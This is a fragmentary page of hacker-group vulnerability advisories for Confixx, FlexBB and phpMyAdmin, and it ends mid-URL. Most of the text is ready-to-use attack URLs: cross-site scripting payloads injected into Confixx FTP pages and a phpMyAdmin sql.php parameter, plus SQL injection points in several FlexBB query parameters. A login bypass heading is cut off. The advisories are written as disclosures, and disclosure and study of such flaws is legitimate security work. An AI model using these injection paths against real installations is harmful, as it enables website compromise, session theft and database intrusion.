p0w3r ~ curse-crew.de
Examples: [confixx]/ftplogin/[username]/ftp_index.php?path=alert('p0w3r
oWnZ')
Software: Confixx <= 3
Vendor: http://www.swsoft.com/
Discovered by: p0w3r - curse-crew.de
Example:
[confixx]/user/[username]/tools_ftp_pwaendern.php?account=alert('p0
w3r oWnZ')
App: FlexBB v0.5.5 BETA
Advistory by: p0w3r - curse-crew.de
SQL Inj:
magic_quotes_gpc = off
/index.php?page=showprofile&id=1'[SQL]/*
/index.php?page=forums&forumid=1'[SQL]/*
/index.php?page=viewthread&threadid=1'[SQL]/*
/index.php?page=editpost&threadid=1'[SQL]/*
Login bypass:
magic_quotes_gpc =
App: phpMyAdmin 2.7.0-pl1
Advistory by: p0w3r
Exploit:
/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS]
Example:
/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_c